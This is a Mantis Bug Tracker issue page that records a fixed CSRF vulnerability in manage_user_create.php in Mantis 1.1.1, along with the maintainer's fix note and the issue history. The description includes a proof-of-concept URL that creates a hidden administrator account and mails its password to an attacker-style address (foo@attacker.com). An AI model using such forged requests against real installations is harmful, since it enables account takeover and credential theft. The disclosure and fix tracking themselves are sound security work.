2014-11-28 17:41 EST

View Issue Details Jump to Notes ] Wiki ]
IDProjectCategoryView StatusLast Update
0008995mantisbtsecuritypublic2008-05-08 21:56
Reporterthraxisp 
Assigned Tothraxisp 
PrioritynormalSeverityminorReproducibilityhave not tried
StatusclosedResolutionfixed 
Product Versiongit trunk 
Target Version1.2.0a1Fixed in Version1.2.0a1 
Summary0008995: CSRF Vulnerabilities in user_create
DescriptionMantis Bug Tracker 1.1.1 Multiple Vulnerabilities

Name Multiple Vulnerabilities in Mantis
Systems Affected Mantis 1.1.1 and possibly earlier versions
Severity
Impact (CVSSv2) (, vector: )
Vendor http://www.mantisbt.org/ [^]
Advisory
Authors Antonio "s4tan" Parata (s4tan AT ush DOT it)
                 Francesco "ascii" Ongaro (ascii AT ush DOT it)
B) CSRF Vulnerabilities

There is a Cross Site Requst Forgery vulnerability in the software. If a logged in user with administrator privileges clicks on the following url:

http://www.example.com/mantis/manage_user_create.php?username=foo&realname=aa&password=aa&password_verify=aa&email=foo@attacker.com&access_level=90&protected=0&enabled=1 [^]

a new user 'foo' with administrator privileges is created. The password of the new user is sent to foo@attacker.com.

TagsNo tags attached.
Attached Files

- Relationships
child of 0008975closedjreese CSRF Vulnerabilities in user_create 
+ Relationships

-  Notes
User avatar

~0017439

thraxisp (manager)

submitted to SVN r5132

Action pages are now qualified by checking for a POST command.
+  Notes

- Issue History
Date Modified Username Field Change
2008-03-22 22:01 thraxisp New Issue
2008-03-22 22:01 thraxisp Status new => assigned
2008-03-22 22:01 thraxisp Assigned To => thraxisp
2008-03-22 22:01 thraxisp Issue generated from: 0008975
2008-03-22 22:01 thraxisp Relationship added child of 0008975
2008-03-22 22:09 thraxisp Status assigned => resolved
2008-03-22 22:09 thraxisp Fixed in Version => 1.2.0
2008-03-22 22:09 thraxisp Resolution open => fixed
2008-03-22 22:09 thraxisp Note Added: 0017439
2008-04-19 04:10 vboctor Status resolved => closed
2008-05-08 21:56 thraxisp View Status private => public
+ Issue History